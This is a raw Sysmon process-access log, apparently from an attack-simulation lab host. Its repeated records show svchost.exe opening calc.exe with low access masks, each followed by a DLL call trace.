22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360977Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360976Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360975Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360974Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360973Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360972Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360971Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360970Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360969Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360968Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360967Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360966Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360965Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360964Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360963Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360962Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360961Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360960Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360959Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360958Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360957Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 